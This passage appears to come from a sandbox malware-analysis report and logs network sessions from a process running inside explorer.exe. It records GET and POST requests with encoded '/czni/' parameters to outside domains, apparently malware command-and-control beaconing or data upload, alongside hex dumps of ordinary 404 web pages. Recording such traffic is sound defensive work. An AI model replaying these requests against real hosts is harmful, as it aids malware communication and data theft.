                                                                          Data Ascii: 3e05<!DOCTYPE html><html class="html" lang="en-CA"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; London Dairy Supply</title><meta name='robots' content='max-image-preview:large' /><meta name="viewport" content="width=device-width, initial-scale=1"><link rel='dns-prefetch' href='//londondairysupply.com' /><link rel='dns-prefetch' href='//translate.google.com' /><link rel="alternate" type="application/rss+xml" title="London Dairy Supply &raquo; Feed" href="https://londondairysupply.com/feed/" /><link rel="alternate" type="application/rss+xml" title="London Dairy Supply &raquo; Comments Feed" href="https://londondairysupply.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"htt
                                                                          Jan 30, 2023 13:41:33.633388996 CET890INData Raw: 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e
                                                                          Data Ascii: ps:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/londondairysupply.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i
                                                                          Jan 30, 2023 13:41:33.633411884 CET891INData Raw: 2c 31 32 39 37 37 38 2c 31 32 37 39 39 39 5d 29 7d 72 65 74 75 72 6e 21 31 7d 28 6f 5b 72 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 74 2e 73 75
                                                                          Data Ascii: ,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everyt
                                                                          Jan 30, 2023 13:41:33.633433104 CET893INData Raw: 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 20 66 69 67
                                                                          Data Ascii: ion{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospa
                                                                          Jan 30, 2023 13:41:33.633454084 CET894INData Raw: 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 6c 65 66
                                                                          Data Ascii: :0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.
                                                                          Jan 30, 2023 13:41:33.633476973 CET895INData Raw: 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 65 6d 70 6c 61 74 65 2d 70 61 72 74 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 3b 6d 61 72 67 69 6e 2d
                                                                          Data Ascii: rgin:0 0 1em}.wp-block-template-part.has-background{padding:1.25em 2.375em;margin-top:0;margin-bottom:0}</style><link rel='stylesheet' id='classic-theme-styles-css' href='http://londondairysupply.com/wp-includes/css/classic-themes.min.css?ve
                                                                          Jan 30, 2023 13:41:33.633497000 CET897INData Raw: 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69
                                                                          Data Ascii: near-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear
                                                                          Jan 30, 2023 13:41:33.633519888 CET898INData Raw: 6e 65 2d 2d 62 6c 75 65 2d 72 65 64 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 62 6c 75 65 2d 72 65 64 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 75 72 6c 28 27 23 77
                                                                          Data Ascii: ne--blue-red: url('#wp-duotone-blue-red');--wp--preset--duotone--midnight: url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green'
                                                                          Jan 30, 2023 13:41:33.633543968 CET899INData Raw: 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 3a 77 68 65 72 65 28 3a
                                                                          Data Ascii: o !important;margin-right: auto !important;}body .is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !important;}b
                                                                          Jan 30, 2023 13:41:33.633568048 CET901INData Raw: 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61
                                                                          Data Ascii: e-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-
                                                                          Jan 30, 2023 13:41:33.745325089 CET902INData Raw: 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72
                                                                          Data Ascii: ) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-bord


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          21192.168.2.54973164.34.68.1080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:41:35.464464903 CET949OUTGET /czni/?20=4xfPiv3RnE&z8rul-n=pjpdKCpJnNXPdeWbwYyFkbOLSaKVTVa2roCT8abPBwtlkFjZcqcvSY6Wc82/f3EmpMB4AQ+PhDNFqdOW9DbfejlZOApCjfoJ4Q== HTTP/1.1
                                                                          Host: www.dellaone.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:41:36.265957117 CET951INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:41:35 GMT
                                                                          Server: Apache
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          X-UA-Compatible: IE=edge
                                                                          Link: <https://londondairysupply.com/wp-json/>; rel="https://api.w.org/"
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Vary: Accept-Encoding,User-Agent
                                                                          Transfer-Encoding: chunked
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Raw: 33 65 30 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 43 41 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4c 6f 6e 64 6f 6e 20 44 61 69 72 79 20 53 75 70 70 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6c 6f 6e 64 6f 6e 64 61 69 72 79 73 75 70 70 6c 79 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 74 72 61 6e 73 6c 61 74 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4c 6f 6e 64 6f 6e 20 44 61 69 72 79 20 53 75 70 70 6c 79 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 6e 64 6f 6e 64 61 69 72 79 73 75 70 70 6c 79 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4c 6f 6e 64 6f 6e 20 44 61 69 72 79 20 53 75 70 70 6c 79 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 6e 64 6f 6e 64 61 69 72 79 73 75 70 70 6c 79 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74
                                                                          Data Ascii: 3e05<!DOCTYPE html><html class="html" lang="en-CA"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; London Dairy Supply</title><meta name='robots' content='max-image-preview:large' /><meta name="viewport" content="width=device-width, initial-scale=1"><link rel='dns-prefetch' href='//londondairysupply.com' /><link rel='dns-prefetch' href='//translate.google.com' /><link rel="alternate" type="application/rss+xml" title="London Dairy Supply &raquo; Feed" href="https://londondairysupply.com/feed/" /><link rel="alternate" type="application/rss+xml" title="London Dairy Supply &raquo; Comments Feed" href="https://londondairysupply.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"htt
                                                                          Jan 30, 2023 13:41:36.265997887 CET952INData Raw: 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e
                                                                          Data Ascii: ps:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/londondairysupply.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}};/*! This file is auto-generated */!function(e,a,t){var n,r,o,i
                                                                          Jan 30, 2023 13:41:36.266017914 CET953INData Raw: 2c 31 32 39 37 37 38 2c 31 32 37 39 39 39 5d 29 7d 72 65 74 75 72 6e 21 31 7d 28 6f 5b 72 5d 29 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 74 2e 73 75
                                                                          Data Ascii: ,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everyt
                                                                          Jan 30, 2023 13:41:36.266037941 CET955INData Raw: 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 61 75 64 69 6f 20 66 69 67
                                                                          Data Ascii: ion{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-audio figcaption{color:hsla(0,0%,100%,.65)}.wp-block-audio{margin:0 0 1em}.wp-block-code{border:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospa
                                                                          Jan 30, 2023 13:41:36.266062021 CET956INData Raw: 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 63 65 6e 74 65 72 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 6c 65 66
                                                                          Data Ascii: :0;padding-right:1em}.wp-block-quote.has-text-align-center{border:none;padding-left:0}.wp-block-quote.is-large,.wp-block-quote.is-style-large,.wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.
                                                                          Jan 30, 2023 13:41:36.266083002 CET957INData Raw: 72 67 69 6e 3a 30 20 30 20 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 65 6d 70 6c 61 74 65 2d 70 61 72 74 2e 68 61 73 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 70 61 64 64 69 6e 67 3a 31 2e 32 35 65 6d 20 32 2e 33 37 35 65 6d 3b 6d 61 72 67 69 6e 2d
                                                                          Data Ascii: rgin:0 0 1em}.wp-block-template-part.has-background{padding:1.25em 2.375em;margin-top:0;margin-bottom:0}</style><link rel='stylesheet' id='classic-theme-styles-css' href='http://londondairysupply.com/wp-includes/css/classic-themes.min.css?ve
                                                                          Jan 30, 2023 13:41:36.266108036 CET958INData Raw: 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69
                                                                          Data Ascii: near-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear
                                                                          Jan 30, 2023 13:41:36.266134024 CET960INData Raw: 6e 65 2d 2d 62 6c 75 65 2d 72 65 64 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 62 6c 75 65 2d 72 65 64 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 6d 69 64 6e 69 67 68 74 3a 20 75 72 6c 28 27 23 77
                                                                          Data Ascii: ne--blue-red: url('#wp-duotone-blue-red');--wp--preset--duotone--midnight: url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green'
                                                                          Jan 30, 2023 13:41:36.266161919 CET961INData Raw: 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 3a 77 68 65 72 65 28 3a
                                                                          Data Ascii: o !important;margin-right: auto !important;}body .is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !important;}b
                                                                          Jan 30, 2023 13:41:36.266191006 CET962INData Raw: 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61
                                                                          Data Ascii: e-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-
                                                                          Jan 30, 2023 13:41:36.378217936 CET964INData Raw: 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72
                                                                          Data Ascii: ) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-bord


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          22192.168.2.549732217.160.0.9480C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:41:46.598280907 CET1012OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.arritalvigo.com
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.arritalvigo.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.arritalvigo.com/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 32 41 47 54 4c 4e 46 52 72 6a 72 76 75 65 48 69 70 74 52 76 69 61 4d 33 6e 39 35 62 48 72 34 34 6e 54 70 69 78 54 7a 4e 67 66 50 66 47 50 64 2d 7e 45 4c 62 45 5f 69 55 7e 48 64 38 4c 79 76 32 71 71 75 35 7e 57 45 57 42 4b 52 78 54 30 31 70 54 76 48 37 5a 39 46 59 28 39 64 4f 4e 51 4b 4f 44 6c 78 76 6a 65 31 31 41 46 45 63 6b 63 55 75 78 30 74 55 50 5a 34 38 6b 64 69 58 6f 5a 58 37 4f 43 53 49 41 62 46 49 6b 73 6a 65 6c 67 6a 73 31 66 47 73 31 75 59 6c 72 42 6a 4b 4a 34 54 36 38 43 5a 4d 7a 43 6b 50 7a 50 53 64 59 4e 78 4b 6c 77 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=2AGTLNFRrjrvueHiptRviaM3n95bHr44nTpixTzNgfPfGPd-~ELbE_iU~Hd8Lyv2qqu5~WEWBKRxT01pTvH7Z9FY(9dONQKODlxvje11AFEckcUux0tUPZ48kdiXoZX7OCSIAbFIksjelgjs1fGs1uYlrBjKJ4T68CZMzCkPzPSdYNxKlw).
                                                                          Jan 30, 2023 13:41:46.629065037 CET1013INHTTP/1.1 404 Not Found
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Date: Mon, 30 Jan 2023 12:41:46 GMT
                                                                          Server: Apache
                                                                          X-Frame-Options: deny
                                                                          Content-Encoding: gzip
                                                                          Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 8f d3 30 10 bd ef af f0 06 a1 82 68 92 ee 0d b5 c9 1e 80 b2 02 c1 66 a5 56 42 48 5c 9c 78 92 cc 6e 62 47 b6 d3 b4 8b f8 ef 4c 9c 56 6a 69 96 f6 52 79 3e de b3 df 9b 49 74 fd 29 f9 b8 fe f9 b0 64 a5 ad ab db ab 68 f8 63 51 09 5c dc 5e 31 16 d5 60 39 cb 4a ae 0d d8 d8 6b 6d ee bf f7 5c c2 d8 5d 05 cc ee 1a 88 3d 0b 5b 1b 66 c6 b8 8c 83 9a b2 54 89 dd 94 bd 6a b8 b6 12 f4 94 61 ae 79 0d ec 37 81 9e fe 4a c0 a2 b4 f3 9b d9 ec f5 e2 2c d9 a1 b0 e5 0b b9 9a eb 02 e5 7c 76 de d5 70 21 50 16 63 a9 54 69 01 7a 2c a3 5a 5b a1 84 b1 54 ae a4 f5 0d 3e c3 0b 37 d9 80 b6 98 f1 ca e7 15 16 72 9e 72 03 3d d4 f9 c5 52 9e 3d 15 5a b5 52 cc ad e6 d2 90 3a 20 ed 69 dd 9f 13 11 7a 19 47 44 53 44 99 57 aa 9b 97 28 04 c8 73 84 28 74 06 1d 79 48 6f 20 ae d8 bb 4f 7e 78 4c 92 17 b1 07 db 06 35 0c b6 ed 9d 3e 54 a1 14 b0 9d b2 5c 55 c4 32 65 bc aa 0e 4d 77 49 72 f7 6d f9 21 59 0f 73 30 0c c8 e5 36 ad 52 65 f7 54 d7 be cf 3e 3b 64 72 89 7d a7 11 f3 d7 bc 60 39 6e c1 30 43 42 52 d8 47 63 5a 3a 2a c9 6a 95 22 cd 9a 80 0d 66 14 f1 fd 91 57 b9 41 89 87 12 df 1d 16 0c 25 5a 24 57 7a 44 88 6f 82 d9 82 d5 7c 8b 75 5b 1f 87 5a 03 da 9d 79 4a 55 b3 c5 e1 9d 1b 84 ae 51 da f6 cf 8c c2 fd 42 44 bd 1f 8e 5e e0 86 a1 88 bd fd 80 0f 62 84 14 75 59 93 69 6c ec f1 7a 3c f2 0d 1f a2 c3 96 08 95 b5 35 19 12 74 1a 2d bc 39 31 fd b0 20 93 e8 bf 38 ac e2 b2 68 79 41 4e 7e 25 f4 95 e3 f4 26 a3 50 07 c8 77 6c 62 74 16 7b 61 68 40 28 ba fc 13 69 1d 64 aa 0e 73 5d f7 c7 f0 52 7f 47 a3 a1 ba a0 52 19 b7 a8 64 50 2a 63 19 c1 5e 6c 9c 7c 49 ee 93 d5 c3 40 b9 5c 5d e2 99 84 fd 75 82 47 9a 99 f1 52 e2 8c 7e 85 83 42 ff 94 bc ed 17 82 56 c0 29 e2 fc 1b 7c 23 1f fb ef dc 5f c7 6f 3e a9 f7 04 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 239TM0hfVBH\xnbGLVjiRy>It)dhcQ\^1`9Jkm\]=[fTjay7J,|vp!PcTiz,Z[T>7rr=R=ZR: izGDSDW(s(tyHo O~xL5>T\U2eMwIrm!Ys06ReT>;dr}`9n0CBRGcZ:*j"fWA%Z$WzDo|u[ZyJUQBD^buYilz<5t-91 8hyAN~%&Pwlbt{ah@(ids]RGRdP*c^l|I@\]uGR~BV)|#_o>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          23192.168.2.549734217.160.0.9480C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:41:49.192296982 CET1020OUTGET /czni/?z8rul-n=7CuzI5hL2DbaheDUreUXt/0ggIp8KK0y2ydS3GGUn+rOJNFozWHMconX3zZMJG7nrNLowVQEJNRqJBBdS7PrQOxc+aMUIwOUOQ==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.arritalvigo.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:41:49.222229958 CET1022INHTTP/1.1 404 Not Found
                                                                          Content-Type: text/html
                                                                          Content-Length: 1271
                                                                          Connection: close
                                                                          Date: Mon, 30 Jan 2023 12:41:49 GMT
                                                                          Server: Apache
                                                                          X-Frame-Options: deny
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 